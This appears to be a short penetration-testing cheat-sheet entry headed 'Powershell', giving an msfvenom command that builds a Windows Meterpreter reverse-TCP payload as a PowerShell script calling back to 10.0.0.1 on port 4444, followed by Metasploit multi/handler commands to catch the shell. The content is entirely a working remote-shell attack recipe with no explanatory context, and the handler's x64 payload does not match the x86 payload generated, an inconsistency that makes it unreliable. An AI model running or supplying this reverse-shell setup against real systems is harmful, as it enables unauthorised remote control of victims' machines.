Powershell

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=4444 -f psh -o reverse.ps1

msfconsole

use multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 10.0.0.1

set lport 4444

exploit

Last updated